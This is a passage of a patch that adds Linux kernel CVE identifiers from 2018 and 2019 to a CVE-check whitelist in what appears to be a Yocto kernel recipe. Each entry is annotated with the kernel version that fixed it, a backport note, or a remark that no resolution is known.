+CVE_CHECK_WHITELIST += "CVE-2018-1092"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1093"
+
+# fixed-version: Fixed after version 4.13rc5
+CVE_CHECK_WHITELIST += "CVE-2018-10938"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1094"
+
+# fixed-version: Fixed after version 4.17rc3
+CVE_CHECK_WHITELIST += "CVE-2018-10940"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1095"
+
+# fixed-version: Fixed after version 4.17rc2
+CVE_CHECK_WHITELIST += "CVE-2018-1108"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1118"
+
+# fixed-version: Fixed after version 4.17rc6
+CVE_CHECK_WHITELIST += "CVE-2018-1120"
+
+# CVE-2018-1121 has no known resolution
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2018-11232"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1128"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1129"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-1130"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-11412"
+
+# fixed-version: Fixed after version 4.17rc7
+CVE_CHECK_WHITELIST += "CVE-2018-11506"
+
+# fixed-version: Fixed after version 4.17rc5
+CVE_CHECK_WHITELIST += "CVE-2018-11508"
+
+# CVE-2018-11987 has no known resolution
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2018-12126"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2018-12127"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2018-12130"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2018-12207"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-12232"
+
+# fixed-version: Fixed after version 4.18rc2
+CVE_CHECK_WHITELIST += "CVE-2018-12233"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-12633"
+
+# fixed-version: Fixed after version 4.18rc2
+CVE_CHECK_WHITELIST += "CVE-2018-12714"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-12896"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-12904"
+
+# CVE-2018-12928 has no known resolution
+
+# CVE-2018-12929 has no known resolution
+
+# CVE-2018-12930 has no known resolution
+
+# CVE-2018-12931 has no known resolution
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13053"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13093"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13094"
+
+# fixed-version: Fixed after version 4.18rc3
+CVE_CHECK_WHITELIST += "CVE-2018-13095"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13096"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13097"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13098"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13099"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13100"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-13405"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13406"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14609"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14610"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14611"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14612"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14613"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14614"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14615"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14616"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14617"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2018-14619"
+
+# fixed-version: Fixed after version 4.20rc6
+CVE_CHECK_WHITELIST += "CVE-2018-14625"
+
+# fixed-version: Fixed after version 4.19rc6
+CVE_CHECK_WHITELIST += "CVE-2018-14633"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14634"
+
+# fixed-version: Fixed after version 4.19rc4
+CVE_CHECK_WHITELIST += "CVE-2018-14641"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2018-14646"
+
+# fixed-version: Fixed after version 4.19rc2
+CVE_CHECK_WHITELIST += "CVE-2018-14656"
+
+# fixed-version: Fixed after version 4.18rc8
+CVE_CHECK_WHITELIST += "CVE-2018-14678"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14734"
+
+# fixed-version: Fixed after version 4.19rc7
+CVE_CHECK_WHITELIST += "CVE-2018-15471"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-15572"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-15594"
+
+# fixed-version: Fixed after version 4.18rc5
+CVE_CHECK_WHITELIST += "CVE-2018-16276"
+
+# fixed-version: Fixed after version 4.8rc1
+CVE_CHECK_WHITELIST += "CVE-2018-16597"
+
+# fixed-version: Fixed after version 4.19rc2
+CVE_CHECK_WHITELIST += "CVE-2018-16658"
+
+# fixed-version: Fixed after version 4.20rc5
+CVE_CHECK_WHITELIST += "CVE-2018-16862"
+
+# fixed-version: Fixed after version 4.20rc3
+CVE_CHECK_WHITELIST += "CVE-2018-16871"
+
+# fixed-version: Fixed after version 5.0rc5
+CVE_CHECK_WHITELIST += "CVE-2018-16880"
+
+# fixed-version: Fixed after version 4.20
+CVE_CHECK_WHITELIST += "CVE-2018-16882"
+
+# fixed-version: Fixed after version 5.0rc1
+CVE_CHECK_WHITELIST += "CVE-2018-16884"
+
+# CVE-2018-16885 has no known resolution
+
+# fixed-version: Fixed after version 4.19rc4
+CVE_CHECK_WHITELIST += "CVE-2018-17182"
+
+# fixed-version: Fixed after version 4.19rc7
+CVE_CHECK_WHITELIST += "CVE-2018-17972"
+
+# CVE-2018-17977 has no known resolution
+
+# fixed-version: Fixed after version 4.19rc7
+CVE_CHECK_WHITELIST += "CVE-2018-18021"
+
+# fixed-version: Fixed after version 4.19
+CVE_CHECK_WHITELIST += "CVE-2018-18281"
+
+# fixed-version: Fixed after version 4.15rc6
+CVE_CHECK_WHITELIST += "CVE-2018-18386"
+
+# fixed-version: Fixed after version 4.20rc5
+CVE_CHECK_WHITELIST += "CVE-2018-18397"
+
+# fixed-version: Fixed after version 4.19rc7
+CVE_CHECK_WHITELIST += "CVE-2018-18445"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2018-18559"
+
+# CVE-2018-18653 has no known resolution
+
+# fixed-version: Fixed after version 4.17rc4
+CVE_CHECK_WHITELIST += "CVE-2018-18690"
+
+# fixed-version: Fixed after version 4.20rc1
+CVE_CHECK_WHITELIST += "CVE-2018-18710"
+
+# fixed-version: Fixed after version 4.20rc2
+CVE_CHECK_WHITELIST += "CVE-2018-18955"
+
+# fixed-version: Fixed after version 4.20rc5
+CVE_CHECK_WHITELIST += "CVE-2018-19406"
+
+# fixed-version: Fixed after version 4.20rc5
+CVE_CHECK_WHITELIST += "CVE-2018-19407"
+
+# fixed-version: Fixed after version 4.20rc6
+CVE_CHECK_WHITELIST += "CVE-2018-19824"
+
+# fixed-version: Fixed after version 4.20rc3
+CVE_CHECK_WHITELIST += "CVE-2018-19854"
+
+# fixed-version: Fixed after version 4.20
+CVE_CHECK_WHITELIST += "CVE-2018-19985"
+
+# fixed-version: Fixed after version 4.20rc6
+CVE_CHECK_WHITELIST += "CVE-2018-20169"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2018-20449"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20509"
+
+# fixed-version: Fixed after version 4.16rc3
+CVE_CHECK_WHITELIST += "CVE-2018-20510"
+
+# fixed-version: Fixed after version 4.19rc5
+CVE_CHECK_WHITELIST += "CVE-2018-20511"
+
+# fixed-version: Fixed after version 5.0rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20669"
+
+# fixed-version: Fixed after version 5.0rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20784"
+
+# fixed-version: Fixed after version 4.20rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20836"
+
+# fixed-version: Fixed after version 4.20rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20854"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20855"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20856"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20961"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20976"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-21008"
+
+# fixed-version: Fixed after version 4.15rc9
+CVE_CHECK_WHITELIST += "CVE-2018-25015"
+
+# fixed-version: Fixed after version 4.17rc7
+CVE_CHECK_WHITELIST += "CVE-2018-25020"
+
+# CVE-2018-3574 has no known resolution
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-3620"
+
+# fixed-version: Fixed after version 4.17rc7
+CVE_CHECK_WHITELIST += "CVE-2018-3639"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-3646"
+
+# fixed-version: Fixed after version 3.7rc1
+CVE_CHECK_WHITELIST += "CVE-2018-3665"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-3693"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2018-5332"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2018-5333"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2018-5344"
+
+# fixed-version: Fixed after version 4.18rc7
+CVE_CHECK_WHITELIST += "CVE-2018-5390"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-5391"
+
+# fixed-version: Fixed after version 4.16rc5
+CVE_CHECK_WHITELIST += "CVE-2018-5703"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2018-5750"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2018-5803"
+
+# fixed-version: Fixed after version 4.17rc6
+CVE_CHECK_WHITELIST += "CVE-2018-5814"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2018-5848"
+
+# Skipping CVE-2018-5856, no affected_versions
+
+# fixed-version: Fixed after version 4.11rc8
+CVE_CHECK_WHITELIST += "CVE-2018-5873"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2018-5953"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2018-5995"
+
+# fixed-version: Fixed after version 4.16rc5
+CVE_CHECK_WHITELIST += "CVE-2018-6412"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2018-6554"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2018-6555"
+
+# CVE-2018-6559 has no known resolution
+
+# fixed-version: Fixed after version 4.15rc9
+CVE_CHECK_WHITELIST += "CVE-2018-6927"
+
+# fixed-version: Fixed after version 4.14rc6
+CVE_CHECK_WHITELIST += "CVE-2018-7191"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2018-7273"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2018-7480"
+
+# fixed-version: Fixed after version 4.15rc3
+CVE_CHECK_WHITELIST += "CVE-2018-7492"
+
+# fixed-version: Fixed after version 4.16rc2
+CVE_CHECK_WHITELIST += "CVE-2018-7566"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-7740"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2018-7754"
+
+# fixed-version: Fixed after version 4.19rc5
+CVE_CHECK_WHITELIST += "CVE-2018-7755"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2018-7757"
+
+# fixed-version: Fixed after version 4.16rc5
+CVE_CHECK_WHITELIST += "CVE-2018-7995"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2018-8043"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2018-8087"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-8781"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-8822"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-8897"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-9363"
+
+# fixed-version: Fixed after version 4.17rc3
+CVE_CHECK_WHITELIST += "CVE-2018-9385"
+
+# fixed-version: Fixed after version 4.17rc3
+CVE_CHECK_WHITELIST += "CVE-2018-9415"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2018-9422"
+
+# fixed-version: Fixed after version 4.15rc6
+CVE_CHECK_WHITELIST += "CVE-2018-9465"
+
+# fixed-version: Fixed after version 4.18rc5
+CVE_CHECK_WHITELIST += "CVE-2018-9516"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2018-9517"
+
+# fixed-version: Fixed after version 4.16rc3
+CVE_CHECK_WHITELIST += "CVE-2018-9518"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2018-9568"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-0136"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-0145"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-0146"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-0147"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-0148"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-0149"
+
+# fixed-version: Fixed after version 5.4rc8
+CVE_CHECK_WHITELIST += "CVE-2019-0154"
+
+# fixed-version: Fixed after version 5.4rc8
+CVE_CHECK_WHITELIST += "CVE-2019-0155"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-10124"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-10125"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-10126"
+
+# CVE-2019-10140 has no known resolution
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-10142"
+
+# fixed-version: Fixed after version 5.3rc3
+CVE_CHECK_WHITELIST += "CVE-2019-10207"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-10220"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-10638"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-10639"
+
+# fixed-version: Fixed after version 5.0rc3
+CVE_CHECK_WHITELIST += "CVE-2019-11085"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-11091"
+
+# fixed-version: Fixed after version 5.4rc8
+CVE_CHECK_WHITELIST += "CVE-2019-11135"
+
+# fixed-version: Fixed after version 4.8rc5
+CVE_CHECK_WHITELIST += "CVE-2019-11190"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-11191"
+
+# fixed-version: Fixed after version 5.3rc4
+CVE_CHECK_WHITELIST += "CVE-2019-1125"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-11477"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-11478"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-11479"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-11486"
+
+# fixed-version: Fixed after version 5.1rc5
+CVE_CHECK_WHITELIST += "CVE-2019-11487"
+
+# fixed-version: Fixed after version 5.1rc6
+CVE_CHECK_WHITELIST += "CVE-2019-11599"
+
+# fixed-version: Fixed after version 5.1
+CVE_CHECK_WHITELIST += "CVE-2019-11683"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-11810"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-11811"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-11815"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-11833"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-11884"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-12378"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-12379"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-12380"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-12381"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-12382"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-12454"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-12455"
+
+# CVE-2019-12456 has no known resolution
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-12614"
+
+# fixed-version: Fixed after version 5.2rc4
+CVE_CHECK_WHITELIST += "CVE-2019-12615"
+
+# fixed-version: Fixed after version 5.2rc7
+CVE_CHECK_WHITELIST += "CVE-2019-12817"
+
+# fixed-version: Fixed after version 5.0
+CVE_CHECK_WHITELIST += "CVE-2019-12818"
+
+# fixed-version: Fixed after version 5.0rc8
+CVE_CHECK_WHITELIST += "CVE-2019-12819"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2019-12881"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-12984"
+
+# fixed-version: Fixed after version 5.2rc4
+CVE_CHECK_WHITELIST += "CVE-2019-13233"
+
+# fixed-version: Fixed after version 5.2
+CVE_CHECK_WHITELIST += "CVE-2019-13272"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-13631"
+
+# fixed-version: Fixed after version 5.3rc2
+CVE_CHECK_WHITELIST += "CVE-2019-13648"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-14283"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-14284"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-14615"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2019-14763"
+
+# fixed-version: Fixed after version 5.3
+CVE_CHECK_WHITELIST += "CVE-2019-14814"
+
+# fixed-version: Fixed after version 5.3
+CVE_CHECK_WHITELIST += "CVE-2019-14815"
+
+# fixed-version: Fixed after version 5.3
+CVE_CHECK_WHITELIST += "CVE-2019-14816"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-14821"
+
+# fixed-version: Fixed after version 5.3
+CVE_CHECK_WHITELIST += "CVE-2019-14835"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-14895"
+
+# cpe-stable-backport: Backported in 5.4.16
+CVE_CHECK_WHITELIST += "CVE-2019-14896"
+
+# cpe-stable-backport: Backported in 5.4.16
+CVE_CHECK_WHITELIST += "CVE-2019-14897"
+
+# CVE-2019-14898 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.11
+CVE_CHECK_WHITELIST += "CVE-2019-14901"
+
+# fixed-version: Fixed after version 5.3rc8
+CVE_CHECK_WHITELIST += "CVE-2019-15030"
+
+# fixed-version: Fixed after version 5.3rc8
+CVE_CHECK_WHITELIST += "CVE-2019-15031"
+
+# fixed-version: Fixed after version 5.2rc2
+CVE_CHECK_WHITELIST += "CVE-2019-15090"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15098"
+
+# cpe-stable-backport: Backported in 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15099"
+
+# fixed-version: Fixed after version 5.3rc5
+CVE_CHECK_WHITELIST += "CVE-2019-15117"
+
+# fixed-version: Fixed after version 5.3rc5
+CVE_CHECK_WHITELIST += "CVE-2019-15118"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15211"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-15212"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15213"
+
+# fixed-version: Fixed after version 5.1rc6
+CVE_CHECK_WHITELIST += "CVE-2019-15214"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15215"
+
+# fixed-version: Fixed after version 5.1
+CVE_CHECK_WHITELIST += "CVE-2019-15216"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15217"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-15218"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-15219"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15220"
+
+# fixed-version: Fixed after version 5.2
+CVE_CHECK_WHITELIST += "CVE-2019-15221"
+
+# fixed-version: Fixed after version 5.3rc3
+CVE_CHECK_WHITELIST += "CVE-2019-15222"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-15223"
+
+# CVE-2019-15239 has no known resolution
+
+# CVE-2019-15290 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.1
+CVE_CHECK_WHITELIST += "CVE-2019-15291"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15292"
+
+# fixed-version: Fixed after version 5.3
+CVE_CHECK_WHITELIST += "CVE-2019-15504"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15505"
+
+# fixed-version: Fixed after version 5.3rc6
+CVE_CHECK_WHITELIST += "CVE-2019-15538"
+
+# fixed-version: Fixed after version 5.1
+CVE_CHECK_WHITELIST += "CVE-2019-15666"
+
+# CVE-2019-15791 has no known resolution
+
+# CVE-2019-15792 has no known resolution
+
+# CVE-2019-15793 has no known resolution
+
+# CVE-2019-15794 needs backporting (fixed from 5.12)
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-15807"
+
+# CVE-2019-15902 has no known resolution
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15916"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15917"
+
+# fixed-version: Fixed after version 5.1rc6
+CVE_CHECK_WHITELIST += "CVE-2019-15918"
+
+# fixed-version: Fixed after version 5.1rc6
+CVE_CHECK_WHITELIST += "CVE-2019-15919"
+
+# fixed-version: Fixed after version 5.1rc6
+CVE_CHECK_WHITELIST += "CVE-2019-15920"
+
+# fixed-version: Fixed after version 5.1rc3
+CVE_CHECK_WHITELIST += "CVE-2019-15921"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-15922"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-15923"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-15924"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15925"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-15926"
+
+# fixed-version: Fixed after version 5.0rc2
+CVE_CHECK_WHITELIST += "CVE-2019-15927"
+
+# CVE-2019-16089 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-16229"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-16230"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-16231"
+
+# cpe-stable-backport: Backported in 5.4.7
+CVE_CHECK_WHITELIST += "CVE-2019-16232"
+
+# fixed-version: Fixed after version 5.4rc5
+CVE_CHECK_WHITELIST += "CVE-2019-16233"
+
+# fixed-version: Fixed after version 5.4rc4
+CVE_CHECK_WHITELIST += "CVE-2019-16234"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-16413"
+
+# fixed-version: Fixed after version 5.3rc7
+CVE_CHECK_WHITELIST += "CVE-2019-16714"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-16746"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2019-16921"
+
+# fixed-version: Fixed after version 5.0
+CVE_CHECK_WHITELIST += "CVE-2019-16994"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-16995"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-17052"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-17053"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-17054"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-17055"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-17056"
+
+# fixed-version: Fixed after version 5.4rc3
+CVE_CHECK_WHITELIST += "CVE-2019-17075"
+
+# fixed-version: Fixed after version 5.4rc4
+CVE_CHECK_WHITELIST += "CVE-2019-17133"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-17351"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-17666"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-18198"
+
+# fixed-version: Fixed after version 5.4rc6
+CVE_CHECK_WHITELIST += "CVE-2019-18282"
+
+# cpe-stable-backport: Backported in 5.4.1
+CVE_CHECK_WHITELIST += "CVE-2019-18660"
+
+# fixed-version: Fixed after version 4.17rc5
+CVE_CHECK_WHITELIST += "CVE-2019-18675"
+
+# CVE-2019-18680 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.1
+CVE_CHECK_WHITELIST += "CVE-2019-18683"
+
